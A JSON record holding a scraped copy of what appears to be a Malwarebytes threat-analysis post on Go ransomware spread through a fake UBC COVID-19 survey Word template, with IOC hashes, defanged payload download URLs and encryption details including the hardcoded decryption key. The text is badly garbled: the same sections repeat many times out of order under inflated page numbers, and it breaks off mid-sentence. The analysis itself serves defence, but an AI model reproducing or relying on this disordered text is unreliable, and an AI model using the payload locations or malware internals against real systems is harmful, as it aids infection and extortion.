{ "id": "b5ecc706-8b64-43a3-8a5e-4d2a1ac11d23", "created_at": "2026-04-10T03:20:15.505884Z", "updated_at": "2026-04-10T03:22:22.87612Z", "deleted_at": null, "sha1_hash": "215d11eb1f4328ea10a9add6803aff006e3356e2", "title": "Fake COVID-19 survey hides ransomware in Canadian university attack", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 10915459, "plain_text": "Fake COVID-19 survey hides ransomware in Canadian university\r\nattack\r\nPublished: 2020-10-27 · Archived: 2026-04-10 02:19:11 UTC\r\nNebula support\r\nOneView support\r\nNebula sign in\r\nOneView sign in\r\nPartner Portal sign in\r\nProducts\r\nPartners\r\nResources\r\nWhy ThreatDown\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 4 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 5 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 6 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 7 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 8 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 9 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 10 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 11 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 12 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 13 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 14 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 15 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 16 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 17 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 18 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 19 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 20 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 21 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 22 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 23 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 24 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 25 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 26 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 27 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 28 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 29 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 30 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang 